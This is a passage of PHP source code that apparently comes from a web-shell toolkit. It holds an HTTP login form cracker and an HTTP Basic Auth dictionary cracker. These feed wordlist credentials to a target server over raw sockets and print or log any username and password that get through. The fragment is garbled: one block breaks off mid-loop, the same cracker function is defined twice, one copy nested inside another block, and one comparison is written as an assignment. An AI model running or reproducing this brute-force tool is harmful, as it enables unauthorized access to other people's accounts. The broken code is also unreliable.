fclose($dictionary);
echo "Done!</font><br>";
} else {
echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>{$hcwd}</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://" . getenv('HTTP_HOST') . "/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
}
}
if ($act == "basicauth") {
global $errorbox, $et, $t, $crack, $hcwd;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
spliturL($_REQUEST['target'], $host, $page);
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
if ($method = 'GET') {
$page .= $data;
}
$dictionary = fopen($_REQUEST['dictionary'], 'r');
echo "<font color=blue>";
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
function authcrackeR()
{
global $errorbox, $et, $t, $hcwd;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
$log = 1;
$file = $_REQUEST['logfilE'];
} else {
$log = 0;
}
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
spliturL($_REQUEST['target'], $host, $page);
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
if ($method == 'GET') {
$page .= $data;
}
$dictionary = fopen($_REQUEST['dictionary'], 'r');
echo '<font color=blue>';
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$so = fsockopen($host, 80, $en, $es, 5);
if (!$so) {
echo "{$errorbox} Can not connect to host{$et}";
break;
} else {
$packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
if ($method == 'POST') {
$packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
}
$packet .= "\r\n\r\n";
$packet .= $data;
fputs($so, $packet);
$res = substr(fgets($so), 9, 2);
fclose($so);
if ($res == '20') {
echo "U: {$user} P: {$pass}</br>";
if ($log) {
file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
}
}
}
}
echo 'Done!</font>';
} else {
echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
}
}
function authcrackeR()
{
global $errorbox, $et, $t, $crack, $hcwd;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
$data = '';
$method = $_REQUEST['method'] ? 'POST' : 'GET';
if (strstr($_REQUEST['target'], '?')) {
$data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
$_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
}
spliturL($_REQUEST['target'], $host, $page);
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
if ($method = 'GET') {
$page .= $data;
}
$dictionary = fopen($_REQUEST['dictionary'], 'r');
echo "<font color=blue>";
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
$so = fsockopen($host, 80, $en, $es, 5);
if (!$so) {
echo "{$errorbox} Can not connect to host{$et}";
break;
} else {
$packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
if ($method == 'POST') {
$packet .= "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen($data);
}
$packet .= "\r\n\r\n";
$packet .= $data;
fputs($so, $packet);
$res = substr(fgets($so), 9, 2);
fclose($so);
if ($res == '20') {
echo "U: {$user} P: {$pass}</br>";
}
flusheR();
}
}
echo "Done!</font>";
} else {
echo "<center><form method=\"POST\" name=form>{$t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>{$hcwd}<input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
}
